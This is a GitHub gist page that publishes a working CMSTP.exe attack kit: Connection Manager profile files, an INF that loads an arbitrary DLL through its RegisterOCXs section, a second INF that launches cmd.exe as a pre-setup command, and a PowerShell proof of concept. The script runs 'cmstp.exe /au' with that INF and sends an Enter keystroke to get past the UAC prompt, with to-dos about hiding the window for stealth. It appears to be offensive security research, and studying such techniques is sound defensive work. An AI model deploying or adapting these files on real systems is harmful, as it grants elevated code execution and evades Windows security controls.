Skip to content

Instantly share code, notes, and snippets.

@api0cradle

api0cradle/CorpVPN.cmp Secret

Last active March 7, 2023 02:22
Show Gist options
  • Star 11 You must be signed in to star a gist
  • Fork 10 You must be signed in to fork a gist
  • Save api0cradle/cf36fd40fa991c3a6f7755d1810cc61e to your computer and use it in GitHub Desktop.
Save api0cradle/cf36fd40fa991c3a6f7755d1810cc61e to your computer and use it in GitHub Desktop.
Download ZIP
CMSTP.exe scripts and files
Raw
CorpVPN.cmp
[Profile Format]
Version=5
[Connection Manager]
CMSFile=CorpVPN\CorpVPN.cms
ConnectionType=1
Raw
CorpVPN.cms
[Profile Format]
Version=5
[ISP]
PBFile=CorpVPN\CorpBook.pbk
RegionFile=CorpVPN\CorpBook.pbr
PBURL=http://msitpros.com/pbserver/pbserver.dll
Mask&SignOn=0x0001
Match&SignOn=0x0000
Mask&SignUp=0x0002
Match&SignUp=0x0002
Mask&Modem=0x0004
Match&Modem=0x0000
Mask&ISDN=0x0008
Match&ISDN=0x0000
Mask&Custom1=0x0010
Match&Custom1=0x0010
Mask&Custom2=0x0080
Match&Custom2=0x0080
Mask&MultiCast=0x0020
Match&MultiCast=0x0000
Mask&Surcharge=0x0040
Match&Surcharge=0x0040
Mask&MultiCastModem=0x0024
Match&MultiCastModem=0x0000
Mask&MultiCastISDN=0x0028
Match&MultiCastISDN=0x0000
Mask&NosurchargeSignon=0x0041
Match&NosurchargeSignon=0x0000
Mask&SurchargeSignon=0x0041
Match&SurchargeSignon=0x0040
FilterA&=NosurchargeSignon
FilterB&=SurchargeSignon
[Service Types]
Modem=Modem
ISDN=ISDN
Modem MultiCast=MultiCastModem
ISDN MultiCast=MultiCastISDN
[Connection Manager]
RedialCount=3
RedialDelay=5
Version=0
DownloadDelay=15
ServiceName=CorpVPN
ServiceMessage=
PBMessage=
DUN=CorpVPN
UserNamePrefix=
UserNameSuffix=
PasswordHandling=0
Logo=
Icon=
SmallIcon=
TrayIcon=
PBLogo=
Dialup=1
Direct=1
ConnectionType=0
Tunnel=0
TunnelReferences=0
HelpFile=
SecureRoutingCompartment=0
[Animated Logo]
[Animation Actions]
[Pre-Init Actions]
[Pre-Connect Actions]
[Pre-Dial Actions]
[Pre-Tunnel Actions]
[Connect Actions]
0=cmdl32.exe %PROFILE%
0&Flags=16
[Auto Applications]
[Disconnect Actions]
[On-Cancel Actions]
[On-Error Actions]
[Menu Options]
[Server&CorpVPN]
SW_Compress=1
Disable_LCP=0
Negotiate_TCP/IP=1
Negotiate_TCP/IPv6=1
SecureLocalFiles=0
EnforceCustomSecurity=0
Custom_Security=1
Require_PAP=0
Require_SPAP=0
Require_CHAP=1
Require_MSCHAP=0
Require_MSCHAP2=1
Require_W95MSCHAP=0
EncryptionType=3
PW_Encrypt=1
PW_EncryptMS=0
DataEncrypt=0
[TCP/IP&CorpVPN]
IP_Header_Compress=1
Gateway_On_Remote=1
IPv6_Gateway_On_Remote=1
Specify_Server_Address=0
IPv6_Specify_Server_Address=0
Raw
CorpVPN.inf
;===========================================================================
;
; All of the customizable sections of this file are in the [Strings] section
; at the bottom.
;
;===========================================================================
[version]
Signature=$chicago$
AdvancedINF=2.5
[CmDial32.Dll]
Version=458754
Build=943259648
; -------------------------------------------------------------------
; All User Installs
; -------------------------------------------------------------------
[DefaultInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection
; -------------------------------------------------------------------
; Launches the All User postinstall commands
; -------------------------------------------------------------------
[PostInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPostSetupCommands=RunPostSetupCommandsSection
; -------------------------------------------------------------------
; Single User Installs
; -------------------------------------------------------------------
[DefaultInstall_SingleUser]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM
AddReg = Xnstall.AddReg.Private
RegisterOCXs=RegisterOCXSection
; -------------------------------------------------------------------
; Launches the Single User postinstall commands
; -------------------------------------------------------------------
[PostInstall_Single]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPostSetupCommands=RunPostSetupCommandsSection
; -------------------------------------------------------------------
; This file section sets up the desktop icon GUID and is thus
; only needed on legacy systems.
; -------------------------------------------------------------------
[Xnstall_Legacy]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon
; These section are kept for legacy compatibility but are no longer used.
[Xnstall_Private]
[Xnstall_AllUser]
; -------------------------------------------------------------------
; Section used to uninstall Private user profiles
; -------------------------------------------------------------------
[Remove_Private]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUnInstDestSectionPrivate
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.Private
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection
; -------------------------------------------------------------------
; Section used to uninstall All User profiles
; -------------------------------------------------------------------
[Remove]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUninstDestSectionAllUsers
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.AllUser
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection
; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or
; after the profile is installed.
;
; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run
; commands before or after the profile is uninstalled.
;
; An example command line is:
; Myprogram.exe /<switches> <options>
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
[RunPostSetupCommandsSection]
;Commands here will be run After setup finishes
[RunPreUnInstCommandsSection]
;Commands here will be run before Uninstall Begins
[RunPostUnInstCommandsSection]
;Commands here will be run after Uninstall Finishes
[RegisterOCXSection]
c:\cmstp\AllTheThings.dll
; -------------------------------------------------------------------
; These are the registry entries for installation.
; -------------------------------------------------------------------
[Xnstall.AddReg.DesktopIcon]
"HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00"
; Please make sure the following three commands are alphabetized by the %Open%, %Delete%,
; and %Settings% entries defined in the Strings section
; the Connect Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%"
; the Delete Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%"
; the Properties Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%"
[Xnstall.AddReg.AllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%"
"HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp"
[Xnstall.AddReg.Private]
; Single User Mappings is now written in code.
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp"
; -------------------------------------------------------------------
; These are the registry settings which
; are deleted during uninstall.
; -------------------------------------------------------------------
[Remove.DelReg.AllUser]
"HKLM", "%AppAct%\%ServiceName%"
"HKLM", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\UserInfo\%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"
[Remove.DelReg.Private]
"HKCU", "%AppAct%\%ServiceName%"
"HKCU", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\SingleUserInfo\%ServiceName%"
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"
[CleanDir]
%49001%\%ShortSvcName%
; -------------------------------------------------------------------
; These are the directory specifications.
; -------------------------------------------------------------------
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[CustInstDestSectionSingleUsers]
49000,49001=SingleUser_LDIDSection, 7
[CustUninstDestSectionAllUsers]
49000,49001=XConnMgrLDIDSectionAllUsers, 5
[CustUnInstDestSectionPrivate]
49000,49001=XConnMgrLDIDSectionPrivate, 5
[SingleUser_LDIDSection]
"HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", ""
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
[XConnMgrLDIDSectionAllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""
[XConnMgrLDIDSectionPrivate]
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""
[DestinationDirs]
Xnstall.CopyFiles=49001, %ShortSvcName%
Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName%
Xnstall.CopyFiles.ICM=49001
Remove.DelFiles=49001, %ShortSvcName%
Remove.DelFiles.ICM=49001
[SourceDisksNames]
55=, , 0
; -------------------------------------------------------------------
; These are the Prompt Sections
; -------------------------------------------------------------------
[RemoveBeginPromptSection]
Prompt=%BeginPrompt%
ButtonType=YESNO
Title=%UninstallAppTitle%
[RemoveEndPromptSection]
Prompt=%EndPrompt%
[Strings]
; -------------------------------------------------------------------
; These are the non localizable strings...
; -------------------------------------------------------------------
KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles"
AppAct = "SOFTWARE\Microsoft\Connection Manager"
; -------------------------------------------------------------------
; These are the localizable strings...
; -------------------------------------------------------------------
UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again."
; When you localize these commands (they are the commands for the Desktop Icon on legacy
; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95
; shows the menus in the order they were added and doesn't alphabetize them for you.
Settings = "P&roperties"
Open = "C&onnect"
Delete = "&Delete"
; -------------------------------------------------------------------
; The following strings are set by the Connection Manager Administration Kit
; Do not change any of the following strings
; -------------------------------------------------------------------
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}"
UninstallAppTitle="CorpVPN"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove CorpVPN?"
EndPrompt="Successfully removed CorpVPN."
DisplayLCID=1033
CmLCID=1033
Allow32bit=0
[CMAK Status]
InfVersion=5
PhoneName=CorpBook
LicenseFile=
IncludeCMCode=0
UpdatePhonebook=1
[Extra Files]
[Merge Profiles]
[Xnstall.AddReg.Icon]
HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0"
[Xnstall.CopyFiles.SingleUser]
CorpVPN.cms,,,4
CorpVPN.inf
[Xnstall.CopyFiles]
CorpVPN.cms,,,4
CorpVPN.inf
[Xnstall.CopyFiles.ICM]
CorpVPN.cmp
[Remove.DelFiles.ICM]
CorpVPN.cmp
[SourceDisksFiles]
CorpVPN.inf = 55
CorpVPN.cmp = 55
CorpVPN.cms = 55
[Remove.DelFiles]
CorpVPN.cms
Raw
UACBypass.inf
;===========================================================================
;
; All of the customizable sections of this file are in the [Strings] section
; at the bottom.
;
;===========================================================================
[version]
Signature=$chicago$
AdvancedINF=2.5
[CmDial32.Dll]
Version=458754
Build=943259648
; -------------------------------------------------------------------
; All User Installs
; -------------------------------------------------------------------
[DefaultInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection
; -------------------------------------------------------------------
; Launches the All User postinstall commands
; -------------------------------------------------------------------
[PostInstall]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
RunPostSetupCommands=RunPostSetupCommandsSection
; -------------------------------------------------------------------
; Single User Installs
; -------------------------------------------------------------------
[DefaultInstall_SingleUser]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPreSetupCommands=RunPreSetupCommandsSection
CopyFiles=Xnstall.CopyFiles.SingleUser, Xnstall.CopyFiles.ICM
AddReg = Xnstall.AddReg.Private
RegisterOCXs=RegisterOCXSection
; -------------------------------------------------------------------
; Launches the Single User postinstall commands
; -------------------------------------------------------------------
[PostInstall_Single]
SmartReboot=N
CustomDestination=CustInstDestSectionSingleUsers
RunPostSetupCommands=RunPostSetupCommandsSection
; -------------------------------------------------------------------
; This file section sets up the desktop icon GUID and is thus
; only needed on legacy systems.
; -------------------------------------------------------------------
[Xnstall_Legacy]
SmartReboot=N
CustomDestination=CustInstDestSectionAllUsers
AddReg=Xnstall.AddReg.DesktopIcon, Xnstall.AddReg.Icon
; These section are kept for legacy compatibility but are no longer used.
[Xnstall_Private]
[Xnstall_AllUser]
; -------------------------------------------------------------------
; Section used to uninstall Private user profiles
; -------------------------------------------------------------------
[Remove_Private]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUnInstDestSectionPrivate
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.Private
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection
; -------------------------------------------------------------------
; Section used to uninstall All User profiles
; -------------------------------------------------------------------
[Remove]
Cleanup=1
SmartReboot=N
BeginPrompt=RemoveBeginPromptSection
EndPrompt=RemoveEndPromptSection
RunPreSetupCommands=RunPreUnInstCommandsSection
CustomDestination=CustUninstDestSectionAllUsers
DelFiles=Remove.DelFiles, Remove.DelFiles.ICM
DelReg=Remove.DelReg.AllUser
DelDirs=CleanDir
RunPostSetupCommands=RunPostUnInstCommandsSection
; The following Run(Pre/Post)SetupCommandsSections allow you to run commands before or
; after the profile is installed.
;
; Similarly the following Run(Pre/Post)UnInstCommandsSections will allow you to run
; commands before or after the profile is uninstalled.
;
; An example command line is:
; Myprogram.exe /<switches> <options>
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
c:\windows\system32\cmd.exe
taskkill /IM cmstp.exe /F
[RunPostSetupCommandsSection]
;Commands here will be run After setup finishes
[RunPreUnInstCommandsSection]
;Commands here will be run before Uninstall Begins
[RunPostUnInstCommandsSection]
;Commands here will be run after Uninstall Finishes
; -------------------------------------------------------------------
; These are the registry entries for installation.
; -------------------------------------------------------------------
[Xnstall.AddReg.DesktopIcon]
"HKCR", "CLSID\%DesktopGUID%",,,"%ServiceName%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%",,"0x00001000","%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%\ShellFolder","Attributes",1,"00","00","00","00"
; Please make sure the following three commands are alphabetized by the %Open%, %Delete%,
; and %Settings% entries defined in the Strings section
; the Connect Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Open\Command",,,"cmmgr32.exe ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Open",,,"%Open%"
; the Delete Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete\Command",,,"cmstp.exe /u ""%49000%\%ShortSvcName%\%ShortSvcName%.inf"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Delete",,,"%Delete%"
; the Properties Command
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...\Command",,,"cmmgr32.exe /settings ""%49000%\%ShortSvcName%.cmp"""
"HKCR", "CLSID\%DesktopGUID%\Shell\Settings...",,,"%Settings%"
[Xnstall.AddReg.AllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "0x00001000", "%49001%"
"HKLM", "%AppAct%\Mappings","%ServiceName%","0x00001000","%49001%\%ShortSvcName%.cmp"
[Xnstall.AddReg.Private]
; Single User Mappings is now written in code.
;"HKCU", "%AppAct%\Mappings","%ServiceName%","","%%UserProfile%%\%PathFromProfileDir%\%ShortSvcName%.cmp"
; -------------------------------------------------------------------
; These are the registry settings which
; are deleted during uninstall.
; -------------------------------------------------------------------
[Remove.DelReg.AllUser]
"HKLM", "%AppAct%\%ServiceName%"
"HKLM", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\UserInfo\%ServiceName%"
"HKCR", "CLSID\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\%DesktopGUID%"
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"
[Remove.DelReg.Private]
"HKCU", "%AppAct%\%ServiceName%"
"HKCU", "%AppAct%\Mappings","%ServiceName%"
"HKCU", "%AppAct%\SingleUserInfo\%ServiceName%"
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%"
[CleanDir]
%49001%\%ShortSvcName%
; -------------------------------------------------------------------
; These are the directory specifications.
; -------------------------------------------------------------------
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[CustInstDestSectionSingleUsers]
49000,49001=SingleUser_LDIDSection, 7
[CustUninstDestSectionAllUsers]
49000,49001=XConnMgrLDIDSectionAllUsers, 5
[CustUnInstDestSectionPrivate]
49000,49001=XConnMgrLDIDSectionPrivate, 5
[SingleUser_LDIDSection]
"HKCU", "%AppAct%", "ProfileInstallPath", "%UnexpectedError%", ""
[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""
[XConnMgrLDIDSectionAllUsers]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""
[XConnMgrLDIDSectionPrivate]
"HKCU", "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%ShortSvcName%", "UninstallDir", "", ""
[DestinationDirs]
Xnstall.CopyFiles=49001, %ShortSvcName%
Xnstall.CopyFiles.SingleUser=49001, %ShortSvcName%
Xnstall.CopyFiles.ICM=49001
Remove.DelFiles=49001, %ShortSvcName%
Remove.DelFiles.ICM=49001
[SourceDisksNames]
55=, , 0
; -------------------------------------------------------------------
; These are the Prompt Sections
; -------------------------------------------------------------------
[RemoveBeginPromptSection]
Prompt=%BeginPrompt%
ButtonType=YESNO
Title=%UninstallAppTitle%
[RemoveEndPromptSection]
Prompt=%EndPrompt%
[Strings]
; -------------------------------------------------------------------
; These are the non localizable strings...
; -------------------------------------------------------------------
KEY_RENAME = "Software\Microsoft\Windows\CurrentVersion\RenameFiles"
AppAct = "SOFTWARE\Microsoft\Connection Manager"
; -------------------------------------------------------------------
; These are the localizable strings...
; -------------------------------------------------------------------
UnexpectedError = "An unexpected error occurred. Please reboot and try the installation again."
; When you localize these commands (they are the commands for the Desktop Icon on legacy
; platforms) you must make sure to re-alphabetize the Registry add calls above. Win95
; shows the menus in the order they were added and doesn't alphabetize them for you.
Settings = "P&roperties"
Open = "C&onnect"
Delete = "&Delete"
; -------------------------------------------------------------------
; The following strings are set by the Connection Manager Administration Kit
; Do not change any of the following strings
; -------------------------------------------------------------------
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
DesktopGUID="{46E030C3-DC6A-4251-80A3-E3E2753FF0E2}"
UninstallAppTitle="CorpVPN"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove CorpVPN?"
EndPrompt="Successfully removed CorpVPN."
DisplayLCID=1033
CmLCID=1033
Allow32bit=0
[CMAK Status]
InfVersion=5
PhoneName=CorpBook
LicenseFile=
IncludeCMCode=0
UpdatePhonebook=1
[Extra Files]
[Merge Profiles]
[Xnstall.AddReg.Icon]
HKCR,"CLSID\%DesktopGUID%\DefaultIcon",,,"%11%\CMMGR32.EXE,0"
[Xnstall.CopyFiles.SingleUser]
CorpVPN.cms,,,4
CorpVPN.inf
[Xnstall.CopyFiles]
CorpVPN.cms,,,4
CorpVPN.inf
[Xnstall.CopyFiles.ICM]
CorpVPN.cmp
[Remove.DelFiles.ICM]
CorpVPN.cmp
[SourceDisksFiles]
CorpVPN.inf = 55
CorpVPN.cmp = 55
CorpVPN.cms = 55
[Remove.DelFiles]
CorpVPN.cms
Raw
UACBypassCMSTP.ps1
# UAC Bypass poc using SendKeys
# Version 1.0
# Author: Oddvar Moe
# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/
# Todo: Hide window on screen for stealth
# Todo: Make script edit the INF file for command to inject...
# Point this to your INF file containing your juicy commands...
$InfFile = "c:\cmstp\UACBypass.inf"
Function Get-Hwnd
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName
)
Process
{
$ErrorActionPreference = 'Stop'
Try
{
$hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle
}
Catch
{
$hwnd = $null
}
$hash = @{
ProcessName = $ProcessName
Hwnd = $hwnd
}
New-Object -TypeName PsObject -Property $hash
}
}
function Set-WindowActive
{
[CmdletBinding()]
Param
(
[Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name
)
Process
{
$memberDefinition = @'
[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
[DllImport("user32.dll", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);
'@
Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32
$hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd
If ($hwnd)
{
$onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)
[User32.Api]::SetForegroundWindow($hwnd)
[User32.Api]::ShowWindow($hwnd, 5)
}
Else
{
[string] $hwnd = 'N/A'
}
$hash = @{
Process = $Name
Hwnd = $hwnd
}
New-Object -TypeName PsObject -Property $hash
}
}
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
#Command to run
$ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
#$ps.Arguments = "/au c:\cmstp\UACBypass.inf"
$ps.Arguments = "/au $InfFile"
$ps.UseShellExecute = $false
#Start it
[system.diagnostics.process]::Start($ps)
do
{
# Do nothing until cmstp is an active window
}
until ((Set-WindowActive cmstp).Hwnd -ne 0)
#Activate window
Set-WindowActive cmstp
#Send the Enter key
[System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment